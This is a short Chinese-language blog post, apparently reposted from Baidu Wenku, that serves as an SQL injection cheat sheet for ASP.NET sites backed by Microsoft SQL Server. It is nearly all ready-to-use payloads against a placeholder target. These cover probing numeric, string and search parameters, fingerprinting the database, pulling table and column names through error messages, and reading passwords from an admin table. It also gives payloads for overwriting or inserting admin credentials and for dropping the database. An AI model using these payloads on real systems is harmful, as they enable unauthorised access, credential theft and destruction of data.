判断注入点:

 

1、数字型

 

http://www.targer.com/article.aspx?id=1

http://www.targer.com/article.aspx?id=1'

http://www.targer.com/article.aspx?id=1 and 1=1

http://www.targer.com/article.aspx?id=1 and 1=2

 

2、字符型

 

http://www.targer.com/article.aspx?action=value' and 1=1

http://www.targer.com/article.aspx?action=value' and 1=2

 

3、搜索型

 

searchpoints%' and 1=1

searchpoints%' and 1=2

 

确定数据库类型:

 

http://www.targer.com/article.aspx?id=1 and user>0

http://www.targer.com/article.aspx?id=1 and (select count(*) from sysobjects)>0

 

查询当前用户数据信息:

 

article.aspx?id=1 having 1=1--

 

暴当前表中的列:

 

article.aspx?id=1 group by admin.username having 1=1--

article.aspx?id=1 group by admin.username,admin.password having 1=1--

 

暴任意表和列:

 

and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1

and (select top col_name(object_id('admin'),N) from sysobjects)>1

 

暴数据库数据:

 

and (select top 1 password from admin where id=N)>1

 

修改数据库中的数据:

 

;update admin set password='oooooo' where username='xxx'

 

增添数据库中的数据:

 

;insert into admin values (xxx,oooooo)--

 

删除数据库:

 

;drop database webdata

 

常用SQL总结:

 

获取当前数据库用户名:and user>0

 

获取当前数据库名:and db_name()>0

 

获取数据库版本:and (select @@version)>0

 

判断是否支持多句查询:;declare @a int--

 

判断是否支持子查询:and (select count(1) from [sysobjects])>=0

 

原文地址:http://wenku.baidu.com/link?url=HUz29K2oQStQY5xhqX84mI622D0tjsiuBN-seONO9YYf0OM12KlEs3Sw5pxwu1Iw2INeWJ-njqNKCWM2d7rMZ1cATTWiyBep5WO0bC2EFjW

posted on 2015-07-13 15:53  milantgh  阅读(750)  评论(0编辑  收藏  举报